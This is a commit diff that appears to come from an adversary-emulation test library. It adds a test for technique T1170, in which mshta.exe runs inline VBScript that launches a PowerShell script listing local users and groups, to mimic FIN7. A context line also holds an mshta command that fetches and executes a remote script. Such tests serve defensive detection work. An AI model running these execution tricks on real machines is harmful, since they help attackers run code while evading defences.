T1170 mshta.exe to execute vb script to execute code (#611)

* start work

* add powershell script to list local users and groups

* remove extra command

atomics/T1170/T1170.yaml

@@ -18,4 +18,20 @@ atomic_tests:
     elevation_required: false
     command: |
       mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
-      
+
+- name: Mshta executes VBScript to execute malicious code
+  description: |
+    Run a local VB script to run local user enumeration powershell command
+
+    This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+  supported_platforms:
+    - windows
+  input_arguments:
+    atomics_path:
+      description: path to atomics folder
+      type: path
+      default: ..\..\atomics
+  executor:
+    name: command_prompt
+    command: |
+      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")

atomics/T1170/src/powershell.ps1

@@ -0,0 +1,2 @@
+Get-LocalUser
+Get-LocalGroup